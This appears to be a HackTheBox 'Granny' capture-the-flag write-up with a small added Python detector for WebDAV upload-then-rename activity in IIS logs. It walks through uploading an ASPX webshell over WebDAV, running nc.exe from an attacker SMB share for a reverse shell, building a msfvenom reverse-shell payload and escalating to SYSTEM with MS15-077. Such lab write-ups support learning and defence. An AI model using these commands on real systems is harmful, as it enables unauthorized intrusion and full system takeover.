An easy Windows box from HackTheBox: get initial access by uploading a webshell over WebDAV, then get root by running a kernel exploit.

Recon

Running the usual nmap scan

sudo nmap -sC -sV -oA nmap/init 
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sun, 18 Sep 2022 17:29:26 GMT
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nearly every HTTP method is enabled, including PUT, which may let us upload a webshell

Exploitation

First, we need an ASPX webshell; I like this one

Then open Burp Suite and intercept a page refresh request to the website

And send the request to Repeater

Then turn it into a PUT request that uploads the webshell, by pasting the webshell source in as the request body

Change the method to PUT and set the path to a file name (here it's shell.aspx)

Sending it fails: the server blocks the upload with a 403 Forbidden error

The workaround is to upload the file with a .txt extension, then use a MOVE request to rename it to .aspx

Now upload the webshell as a .txt file

It is now visible on the server

Then send a MOVE request to rename it to .aspx: change the method to MOVE and add a Destination header of "/shell.aspx"

Now we have a webshell!
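As an added defensive example (not part of the original writeup): a small Python detector that reads IIS W3C extended log lines and flags the PUT-then-MOVE pattern used above. The log lines are constructed, and the column layout is assumed to be the IIS 6 default.

```python
"""Flag WebDAV upload-then-rename activity in IIS W3C extended logs."""
import os

# Extensions IIS 6 hands to a script engine; assumed list, extend for your server.
EXEC_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".cer", ".soap"}

# Constructed sample log (not captured from the box) in IIS W3C extended format.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2022-09-18 17:29:26 10.10.10.15 GET /index.html - 80 - 10.10.14.5 Mozilla/5.0 200 0 0
2022-09-18 17:30:01 10.10.10.15 PUT /shell.aspx - 80 - 10.10.14.5 Mozilla/5.0 403 0 0
2022-09-18 17:30:40 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.5 Mozilla/5.0 201 0 0
2022-09-18 17:31:05 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.5 Mozilla/5.0 201 0 0
2022-09-18 17:31:20 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.5 Mozilla/5.0 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def detect(text):
    """Return (severity, reason, client_ip, path) tuples for risky WebDAV writes."""
    alerts = []
    uploaded = set()  # (client ip, path) pairs successfully written via PUT
    for r in parse_w3c(text):
        method, path, status = r["cs-method"], r["cs-uri-stem"], r["sc-status"]
        ext = os.path.splitext(path)[1].lower()
        key = (r["c-ip"], path)
        if method == "PUT":
            if status.startswith("2"):
                uploaded.add(key)
                alerts.append(("medium", "PUT succeeded", r["c-ip"], path))
            elif ext in EXEC_EXT:
                alerts.append(("medium", "PUT of executable content refused", r["c-ip"], path))
        elif method in ("MOVE", "COPY"):
            # W3C logs do not record the Destination header, so correlate on the
            # source path: moving something this client just uploaded is the rename trick.
            if key in uploaded:
                alerts.append(("high", f"{method} of a freshly uploaded file", r["c-ip"], path))
            else:
                alerts.append(("medium", f"{method} request", r["c-ip"], path))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```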

Now use SMB to run nc.exe and get a reverse shell

First copy nc.exe into the current directory, then run Impacket's smbserver.py to share that directory over SMB

smbserver.py share .

Then set up a listener on port 4444

And in the webshell run

/c \\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444

And get a shell!

┌──(kali㉿kali)-[~/Documents/htb/granny]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


c:\windows\system32\inetsrv> whoami
nt authority\network service

Then run systeminfo to collect the installed hotfixes and other details about the system, and save the output to a local text file on Kali

c:\windows\system32\inetsrv> systeminfo

Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 1 Hours, 57 Minutes, 24 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 739 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,283 MB
Page File: In Use:         187 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

From here, run Windows Exploit Suggester - Next Generation (wesng) against the saved systeminfo text file; it reports many privilege escalation candidates

I opted to use MS15-077. I uploaded the exploit exe to the victim along with a reverse shell executable (made with msfvenom)

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f exe > rev.exe 

Set up a listener

rlwrap nc -lnvp 9001

And serve the executables with smbserver.py again

smbserver.py share .

Then on the victim, change to the TEMP directory and copy them over from the share

c:\windows\TEMP> copy \\10.10.14.5\share\elevator.exe elevator.exe

c:\windows\TEMP> copy \\10.10.14.5\share\rev.exe rev.exe

And run the exploit

c:\windows\TEMP> elevator.exe rev.exe

Check back on the listener

listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\Temp>whoami
nt authority\system

And we have root (NT AUTHORITY\SYSTEM)!